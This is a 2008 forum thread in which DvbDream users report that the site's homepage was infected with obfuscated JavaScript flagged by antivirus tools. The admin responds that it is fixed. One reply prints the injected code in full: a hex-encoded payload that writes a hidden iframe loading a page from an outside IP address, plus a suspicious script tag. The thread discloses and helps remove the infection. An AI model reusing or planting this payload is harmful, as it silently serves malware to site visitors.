DvbDream Community

- No topics related to illegal ways of watching TV ! -
https://www.dvbdream.org:443/forum/

homepage has a javascript virus / trojan

https://www.dvbdream.org:443/forum/viewtopic.php?f=1&t=1936

Page 1 of 1

homepage has a javascript virus / trojan

Posted: Wed Apr 23, 2008 6:32 pm
by hugh2
View the source of http://www.dvbdream.org/index.php

Look down at the bottom, there is some javascript which is encoded / obfuscated. If you save the homepage as an HTML file and submit it to Virustotal, 9 programs detect it as malware. (they give different names for it, eg. JS/Psyme.QM, Trojan.Clicker.HTML.IFrame.AR, JS/Agent.H1 etc.)

I emailed rreloc (at yahoo dot com - this is the author's address, right?) regarding this 4 days ago and have so far received no response.

Does anyone know why he chooses to remain anonymous?

[edited to remove author's literal email address]

Posted: Wed Apr 23, 2008 6:55 pm
by genpix
please remove e-mail address from the post :twisted:
You may publish you own if you wish.
But it's a common rule of all forums: NO e-mail addresses.
crawling robots find these addresses and then tons of SPAM go there.

Posted: Thu Apr 24, 2008 12:27 am
by rel
um thats weird, :? I'll check it

Posted: Thu Apr 24, 2008 8:08 am
by saentist
more then week
i see this
Image

in kasperski forum

Code: Select all

function v4801fb955f010(v4801fb955f809){ function v4801fb9560001 () {var v4801fb95607f7=16; return v4801fb95607f7;} return(parseInt(v4801fb955f809,v4801fb9560001()));}function v4801fb9560ff0(v4801fb95617e9){ var v4801fb9561ffb='';for(v4801fb956299e=0; v4801fb956299e<v4801fb95617e9.length; v4801fb956299e+=2){ v4801fb9561ffb+=(String.fromCharCode(v4801fb955f010(v4801fb95617e9.substr(v4801f
b956299e, 2))));}return v4801fb9561ffb;} document.write(v4801fb9560ff0('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E
777269746528273C696672616D65206E616D653D3237623234393633207372633D5C27687474703A
2
F2F37372E3232312E3133332E3139302F2E69662F676F2E68746D6C3F272B4D6174682E726F756E6
4
284D6174682E72616E646F6D28292A313735343734292B2766633334396331623631305C27207769
6
474683D333937206865696768743D343432207374796C653D5C27646973706C61793A206E6F6E655
C
273E3C2F696672616D653E27293C2F5343524950543E'));<
this is in source of page

also check for links like this

Code: Select all

<script language='javascript' src='http://127.0.0.1:1025/js.cgi?a&r=41'></script>

Posted: Fri Apr 25, 2008 1:41 am
by rel
fixed, still trying to find out what security weakness caused that on the site.

Posted: Fri Apr 25, 2008 2:48 am
by saentist
problem is some were on host storing part not on your page exact
mainly Apache problem

Edit
problem continue
with new

Posted: Fri Apr 25, 2008 10:29 am
by Snuffer
Just 2 minuts ago i have it with NOD32 Trojan to
All times are UTC-07:00
Page 1 of 1
Powered by phpBB® Forum Software © phpBB Limited
https://www.phpbb.com/